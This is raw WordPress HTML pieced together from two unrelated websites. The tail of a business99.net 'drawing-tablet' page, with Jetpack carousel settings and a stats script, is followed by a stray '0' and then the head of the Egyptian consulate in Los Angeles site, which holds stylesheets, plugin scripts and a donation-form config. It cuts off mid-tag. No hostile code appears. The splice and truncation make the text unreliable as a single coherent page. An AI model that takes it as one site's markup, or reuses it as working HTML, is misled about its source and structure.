{"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/www.business99.net\/wp-admin\/admin-ajax.php","nonce":"ca8913a72f","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/www.business99.net\/wp-login.php?redirect_to=https%3A%2F%2Fwww.business99.net%2Fdrawing-tablet%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.business99.net/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20190102'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.0.1',blog:'152147599',post:'6734',tz:'0',srv:'www.business99.net'} ]); _stq.push([ 'clickTrackerInit', '152147599', '6734' ]); </script> </body> </html>
0
<!doctype html> <html lang="en-US" > <head> <meta charset="UTF-8"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://egyconsulatela.com/xmlrpc.php"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>The Counslate General Of The Arab Republic Of Egypt In Los Angeles</title> <link rel="alternate" hreflang="en" href="http://egyconsulatela.com/" /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="The Counslate General Of The Arab Republic Of Egypt In Los Angeles &raquo; Feed" href="http://egyconsulatela.com/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/egyconsulatela.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='layerslider-css' href='http://egyconsulatela.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.7.1' type='text/css' media='all' /> <link rel='stylesheet' id='ls-google-fonts-css' href='http://fonts.googleapis.com/css?family=Lato:100,300,regular,700,900%7COpen+Sans:300%7CIndie+Flower:regular%7COswald:300,regular,700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='easy-facebook-likebox-plugin-styles-css' href='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/css/public.css?ver=4.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='easy-facebook-likebox-font-awesome-css' href='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/css/font-awesome.css?ver=4.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='easy-facebook-likebox-animate-css' href='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/css/animate.css?ver=4.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='easy-facebook-likebox-popup-styles-css' href='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/popup/magnific-popup.css?ver=4.3.5' type='text/css' media='all' /> <link rel='stylesheet' id='easy-sidebar-menu-widget-css-css' href='http://egyconsulatela.com/wp-content/plugins/easy-sidebar-menu-widget/assets/css/easy-sidebar-menu-widget.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='http://egyconsulatela.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.7.2' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='wpos-slick-style-css' href='http://egyconsulatela.com/wp-content/plugins/wp-responsive-recent-post-slider/assets/css/slick.css?ver=1.4.1' type='text/css' media='all' /> <link rel='stylesheet' id='wppsac-public-style-css' href='http://egyconsulatela.com/wp-content/plugins/wp-responsive-recent-post-slider/assets/css/recent-post-style.css?ver=1.4.1' type='text/css' media='all' /> <link rel='stylesheet' id='give-styles-css' href='http://egyconsulatela.com/wp-content/plugins/give/assets/dist/css/give.css?ver=2.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wpml-legacy-horizontal-list-0-css' href='//egyconsulatela.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style.css?ver=1' type='text/css' media='all' /> <style id='wpml-legacy-horizontal-list-0-inline-css' type='text/css'> .wpml-ls-statics-shortcode_actions, .wpml-ls-statics-shortcode_actions .wpml-ls-sub-menu, .wpml-ls-statics-shortcode_actions a {border-color:#cdcdcd;}.wpml-ls-statics-shortcode_actions a {color:#444444;background-color:#ffffff;}.wpml-ls-statics-shortcode_actions a:hover,.wpml-ls-statics-shortcode_actions a:focus {color:#000000;background-color:#eeeeee;}.wpml-ls-statics-shortcode_actions .wpml-ls-current-language>a {color:#444444;background-color:#ffffff;}.wpml-ls-statics-shortcode_actions .wpml-ls-current-language:hover>a, .wpml-ls-statics-shortcode_actions .wpml-ls-current-language>a:focus {color:#000000;background-color:#eeeeee;} </style> <link rel='stylesheet' id='wpml-menu-item-0-css' href='//egyconsulatela.com/wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/menu-item/style.css?ver=1' type='text/css' media='all' /> <link rel='stylesheet' id='trp-language-switcher-style-css' href='http://egyconsulatela.com/wp-content/plugins/translatepress-multilingual/assets/css/trp-language-switcher.css?ver=1.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='trp-jquery-ui-style-css' href='http://egyconsulatela.com/wp-content/plugins/translatepress-multilingual/assets/css/trp-jquery-ui.css?ver=1.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='http://egyconsulatela.com/wp-content/plugins/unyson/framework/static/libs/font-awesome/css/font-awesome.min.css?ver=2.7.12' type='text/css' media='all' /> <link rel='stylesheet' id='netgo-expandable-collapsible-menu-css' href='http://egyconsulatela.com/wp-content/plugins/netgo-expandablecollapsible-menu/include/styles.css?ver=1.0' type='text/css' media='screen' /> <link rel='stylesheet' id='newsletter-subscription-css' href='http://egyconsulatela.com/wp-content/plugins/newsletter/subscription/style.css?ver=5.4.0' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/css/bootstrap.css?ver=2.0.15' type='text/css' media='all' /> <link rel='stylesheet' id='fw-mmenu-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/css/jquery.mmenu.all.css?ver=2.0.15' type='text/css' media='all' /> <link rel='stylesheet' id='the-core-style-css' href='http://egyconsulatela.com/wp-content/uploads/the-core-style.css?ver=1525417214' type='text/css' media='all' /> <link rel='stylesheet' id='fw-theme-style-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-child/style.css?ver=2.0.15' type='text/css' media='all' /> <style id='fw-theme-style-inline-css' type='text/css'> .tf-sh-dd0730becb64b50102f5aaa266f80f27 .fw-wrap-col-inner{background-color:#000000;}@media only screen and (max-width: 767px) { .tf-sh-dd0730becb64b50102f5aaa266f80f27 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-d3038c4b582217c0a04816fe6cb9e677 { background: #ffa500; background: -moz-linear-gradient(-45deg, #ffa500 0%, #ffff00 100%); background: -webkit-linear-gradient(-45deg, #ffa500 0%,#ffff00 100%); background: linear-gradient(135de, #ffa500 0%,#ffff00 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#ffa500", endColorstr="#ffff00",GradientType=1 ); } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } @media only screen and (max-width: 767px) { .tf-sh-aa6f903c66df69300829385f4c506527 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-71ce5f82fad424e85071cdf7e4a2a67b .fw-special-title {font-family: 'Lato';font-style: normal;font-weight:700;line-height:43px;font-size:36px;letter-spacing:-1px;color:#ffffff;}@media(max-width:767px){.tf-sh-71ce5f82fad424e85071cdf7e4a2a67b .fw-special-title{font-size: 25px ; line-height: 30px ;}} @media only screen and (max-width: 767px) { .tf-sh-4ba484e3109ded22e5ba45f9037b7e7e .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-2d60ecd4c684798724f6a7eea8b002ad .fw-text-inner {font-family: 'Lato';font-style:italic;font-weight:700;line-height:30px;font-size:24px;letter-spacing:0px;color:#ffffff;}@media(max-width:767px){.tf-sh-2d60ecd4c684798724f6a7eea8b002ad .fw-text-inner{font-size: 22px ; line-height: 27px ;}} @media only screen and (max-width: 767px) { .tf-sh-ae8c19c666bd23af7ad6d0562ecde760 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-72cc85e59c1f43ea8250106b72260d8e .fw-text-inner {font-family: 'Lato';font-style:italic;font-weight:700;line-height:30px;font-size:24px;letter-spacing:0px;color:#ffffff;}@media(max-width:767px){.tf-sh-72cc85e59c1f43ea8250106b72260d8e .fw-text-inner{font-size: 22px ; line-height: 27px ;}} @media only screen and (max-width: 767px) { .tf-sh-395a67f16196f7ea2a560356b4636a19 .fw-col-inner{padding-top:15px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-7112a43f99ded6f3ebbaf9af9eda722a .fw-text-inner {font-family: 'Lato';font-style:italic;font-weight:700;line-height:30px;font-size:24px;letter-spacing:3px;color:#ffffff;}@media(max-width:767px){.tf-sh-7112a43f99ded6f3ebbaf9af9eda722a .fw-text-inner{font-size: 22px ; line-height: 27px ;}} @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } @media only screen and (max-width: 767px) { .tf-sh-0cb9f45e2b31877faedfe936f5e8a929 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-0cb9f45e2b31877faedfe936f5e8a929 .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } .tf-sh-8d69d4cdddfb375c3fefdac470ed6273 .fw-col-inner{padding: 0px 50px 0px 0px;}@media only screen and (min-width: 768px) and (max-width: 991px) { .tf-sh-8d69d4cdddfb375c3fefdac470ed6273 .fw-col-inner{padding-bottom:30px;} }@media only screen and (max-width: 767px) { .tf-sh-8d69d4cdddfb375c3fefdac470ed6273 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-c01f35b88b9e5c235ff8148438117bef.postlist .fw-btn-post-read-more-blog span {font-family: 'Lato';font-style:italic;font-weight:700;line-height:30px;font-size:15px;letter-spacing:-0.5px;} .tf-sh-5e2df35798fd54dd7bc9fd8370048acb .fw-col-inner{padding: 0px 50px 0px 0px;}@media only screen and (min-width: 768px) and (max-width: 991px) { .tf-sh-5e2df35798fd54dd7bc9fd8370048acb .fw-col-inner{padding-bottom:30px;} }@media only screen and (max-width: 767px) { .tf-sh-5e2df35798fd54dd7bc9fd8370048acb .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-ebff5828497e6c3d6d2eece5d3d4fe01.postlist .fw-btn-post-read-more-blog span {font-family: 'Lato';font-style:italic;font-weight:700;line-height:30px;font-size:15px;letter-spacing:-0.5px;} .tf-sh-c0e7f06cb3340357a7a02e50fce4b071 { background: #ffa500; background: -moz-linear-gradient(-45deg, #ffa500 0%, #ffff00 100%); background: -webkit-linear-gradient(-45deg, #ffa500 0%,#ffff00 100%); background: linear-gradient(135de, #ffa500 0%,#ffff00 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#ffa500", endColorstr="#ffff00",GradientType=1 ); } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } .tf-sh-771b5958fbd6d8e0496321970b7d6ef8 .fw-col-inner{padding: 0px 0px 0px 22px;}.tf-sh-771b5958fbd6d8e0496321970b7d6ef8 .fw-wrap-col-inner{background-color:#ffffff;}@media only screen and (max-width: 767px) { .tf-sh-771b5958fbd6d8e0496321970b7d6ef8 .fw-col-inner{padding-top:0px;padding-right:15px;padding-bottom:0px;padding-left:15px;} } .tf-sh-cdf97ebe2b72c5a3a58f7dbe953aa520 .fw-wrap-col-inner{background-color:#ffffff;}@media only screen and (max-width: 767px) { .tf-sh-cdf97ebe2b72c5a3a58f7dbe953aa520 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar .cal-row-head .cal-cell1 {font-family: 'Lato';font-style: normal;font-weight:900;line-height:26px;font-size:15px;letter-spacing:0px;color:#2e4751;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .calendar-navigation h3 {font-family: 'Lato';font-style: normal;font-weight:300;line-height:34px;font-size:26px;letter-spacing:0px;color:#2e4751;}@media(max-width:767px){.tf-sh-ba08190d9d423d173e710fcdb3643446 .calendar-navigation h3{font-size: 21px ; line-height: 27px ;}}.tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar .cal-month-day span.pull-left {font-family: 'Lato';font-style: normal;font-weight:300;line-height:22px;font-size:15px;letter-spacing:0px;color:#ffffff;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar #cal-slide-content a.event-item {font-family: 'Lato';font-style: normal;font-weight:300;line-height:24px;font-size:16px;letter-spacing:0px;color:#000000;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar a.cal-event-week {font-family: 'Lato';font-style: normal;font-weight:300;line-height:24px;font-size:16px;letter-spacing:0px;color:#000000;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar #cal-slide-content a.event-item:hover, .tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar a.cal-event-week {opacity:0.8;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .fw-shortcode-calendar #cal-slide-content a.event-item:before { font-size: 16px;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .cal-day-inmonth { background-color: #2e4751;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .cal-day-outmonth { background-color: #5a747e;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .cal-month-box .event-day { background-color: #fcfc16;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .cal-month-box .cal-day-today { background-color: #f20707;}.tf-sh-ba08190d9d423d173e710fcdb3643446 .cal-month-day:hover, .tf-sh-ba08190d9d423d173e710fcdb3643446 .cal-month-day.cal-day-outmonth.event-day:hover { background-color: #b5bfc4;} .tf-sh-388e8b56785a65d56ca50c8b78e48f7e .fw-col-inner{padding: 0px 0px 0px 50px;}@media only screen and (min-width: 768px) and (max-width: 991px) { .tf-sh-388e8b56785a65d56ca50c8b78e48f7e .fw-col-inner{padding-top:80px;padding-right:50px;padding-left:50px;} }@media only screen and (max-width: 767px) { .tf-sh-388e8b56785a65d56ca50c8b78e48f7e .fw-col-inner{padding-top:0px;padding-right:15px;padding-bottom:0px;padding-left:15px;} } .tf-sh-baaf3fb4a3ebbd31459bb822a7e1ae5c .fw-special-subtitle {font-family: 'Lato';font-style:italic;font-weight:400;line-height:10px;font-size:15px;letter-spacing:-0.5px;color:#ffffff;} .tf-sh-c8a8951174d8111ab3557f13d962e50f .fw-special-title {font-family: 'Lato';font-style: normal;font-weight:700;line-height:38px;font-size:36px;letter-spacing:-0.5px;color:#1e414e;}@media(max-width:767px){.tf-sh-c8a8951174d8111ab3557f13d962e50f .fw-special-title{font-size: 25px ; line-height: 27px ;}}.tf-sh-c8a8951174d8111ab3557f13d962e50f .fw-special-subtitle {font-family: 'Lato';font-style:italic;font-weight:400;line-height:39px;font-size:15px;letter-spacing:-0.5px;color:#ffffff;} .tf-sh-ba6d73df81ec0b835fc3a2f0de990be4 .fw-text-inner {font-family: 'Lato';font-style: normal;font-weight:400;line-height:24px;font-size:15px;letter-spacing:0px;color:#1e414e;} .tf-sh-f3868c78f9cf1b54fbdb98546c56b564{ border-width: 2px; }.tf-sh-f3868c78f9cf1b54fbdb98546c56b564{ border-radius: 2px; }.tf-sh-f3868c78f9cf1b54fbdb98546c56b564,.tf-sh-f3868c78f9cf1b54fbdb98546c56b564:focus{ border-color: #1e414e }.tf-sh-f3868c78f9cf1b54fbdb98546c56b564:hover { background-color: #1e414e; border-color: #1e414e }.tf-sh-f3868c78f9cf1b54fbdb98546c56b564, .tf-sh-f3868c78f9cf1b54fbdb98546c56b564:focus {font-family: 'Lato';font-style:italic;font-weight:700;line-height:31px;font-size:15px;letter-spacing:-0.5px;color:#1e414e;}.tf-sh-f3868c78f9cf1b54fbdb98546c56b564:hover { color: #ffffff } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } .tf-sh-c2ba4371af6105aaef8dd7cb2e6ee12b .fw-col-inner{padding: 20px 13px 30px 13px;}@media only screen and (max-width: 767px) { .tf-sh-c2ba4371af6105aaef8dd7cb2e6ee12b .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-56d07e166b097741d4b6ee425ea823be .fw-col-inner{padding: 20px 13px 30px 13px;}.tf-sh-56d07e166b097741d4b6ee425ea823be .fw-wrap-col-inner {background-image:url(//hostallover.com/losangeles/wp-content/uploads/2016/03/newslater-bg.jpg); background-repeat: no-repeat; background-position: left top; background-size: auto;background-color:#b5bfc4;}@media only screen and (max-width: 767px) { .tf-sh-56d07e166b097741d4b6ee425ea823be .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } .tf-sh-900cb213d4465d25b89bfd872ae7119b .fw-special-title {font-family: 'Lato';font-style: normal;font-weight:900;line-height:38px;font-size:30px;letter-spacing:0px;color:#000000;}@media(max-width:767px){.tf-sh-900cb213d4465d25b89bfd872ae7119b .fw-special-title{font-size: 24px ; line-height: 30px ;}}.tf-sh-900cb213d4465d25b89bfd872ae7119b .fw-special-subtitle {font-family: 'Lato';font-style:italic;font-weight:400;line-height:23px;font-size:15px;letter-spacing:-0.5px;color:#000000;} .tf-sh-fe95360e6ff4eae6e057f4e344cb2343{ border-radius: 5px; }.tf-sh-fe95360e6ff4eae6e057f4e344cb2343, .tf-sh-fe95360e6ff4eae6e057f4e344cb2343:focus{ background-color: #fcfc16 }.tf-sh-fe95360e6ff4eae6e057f4e344cb2343:hover { background-color: #1e414e }.tf-sh-fe95360e6ff4eae6e057f4e344cb2343, .tf-sh-fe95360e6ff4eae6e057f4e344cb2343:focus {font-family: 'Lato';font-style:italic;font-weight:700;line-height:46px;font-size:30px;letter-spacing:-0.5px;color:#1e414e;}@media(max-width:767px){.tf-sh-fe95360e6ff4eae6e057f4e344cb2343{font-size: 24px ; line-height: 37px ;}}.tf-sh-fe95360e6ff4eae6e057f4e344cb2343:hover { color: #ffffff } .tf-sh-b2246012eca465064d3193ba99247a08 .fw-col-inner{padding: 20px 13px 30px 13px;}@media only screen and (max-width: 767px) { .tf-sh-b2246012eca465064d3193ba99247a08 .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} } @media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-col-inner{padding-top:0px;padding-right:0px;padding-bottom:0px;padding-left:0px;} }@media only screen and (max-width: 767px) { .tf-sh-cacb747f5fa7f48f20f26b934867c06f .fw-wrap-col-inner {margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px;} } </style> <link rel='stylesheet' id='prettyPhoto-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/css/prettyPhoto.css?ver=2.0.15' type='text/css' media='all' /> <link rel='stylesheet' id='animate-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/css/animate.css?ver=2.0.15' type='text/css' media='all' /> <link rel='stylesheet' id='fw-shortcode-section-background-video-css' href='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/css/background.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='calendar-css' href='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/css/calendar.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='fw-googleFonts-css' href='https://fonts.googleapis.com/css?family=Lato%3A100%2C700%2C300%2Citalic%2Cregular%2C700italic%2C900%2C900italic%2C300italic%7CNTR%3Aregular%7CMontserrat%3Aregular%2Citalic%2C700%2C700italic%7CQuattrocento+Sans%3Aregular%7CMerriweather%3A300%2C300italic&#038;subset=latin-ext%2Clatin&#038;ver=4.9.10' type='text/css' media='all' /> <!--n2css--><script type='text/javascript'> /* <![CDATA[ */ var LS_Meta = {"v":"6.7.1"}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedia.jquery.js?ver=6.7.1'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transitions.js?ver=6.7.1'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/popup/jquery.magnific-popup.min.js?ver=4.3.5'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/js/jquery.cookie.js?ver=4.3.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var public_ajax = {"ajax_url":"http:\/\/egyconsulatela.com\/wp-admin\/admin-ajax.php"}; var public_ajax = {"ajax_url":"http:\/\/egyconsulatela.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/js/public.js?ver=4.3.5'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.7.2'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.7.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var give_global_vars = {"ajaxurl":"http:\/\/egyconsulatela.com\/wp-admin\/admin-ajax.php","checkout_nonce":"62496b67b9","currency":"USD","currency_sign":"$","currency_pos":"before","thousands_separator":",","decimal_separator":".","no_gateway":"Please select a payment method.","bad_minimum":"The minimum custom donation amount for this form is","bad_maximum":"The maximum custom donation amount for this form is","general_loading":"Loading...","purchase_loading":"Please Wait...","number_decimals":"0","give_version":"2.1.1","magnific_options":{"main_class":"give-modal","close_on_bg_click":false},"form_translation":{"payment-mode":"Please select payment mode.","give_first":"Please enter your first name.","give_email":"Please enter a valid email address.","give_user_login":"Invalid username. Only lowercase letters (a-z) and numbers are allowed.","give_user_pass":"Enter a password.","give_user_pass_confirm":"Enter the password confirmation.","give_agree_to_terms":"You must agree to the terms and conditions."},"confirm_email_sent_message":"Please check your email and click on the link to access your complete donation history.","ajax_vars":{"ajaxurl":"http:\/\/egyconsulatela.com\/wp-admin\/admin-ajax.php","ajaxNonce":"50fe47e783","loading":"Loading","select_option":"Please select an option","default_gateway":"manual","permalinks":"1","number_decimals":0}}; var giveApiSettings = {"root":"http:\/\/egyconsulatela.com\/wp-json\/give-api\/v2\/","rest_base":"give-api\/v2"}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/give/assets/dist/js/give.js?ver=2.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var trp_language_switcher_data = {"shortcode_ls_flags":"1"}; /* ]]> */ </script> <script type='text/javascript' 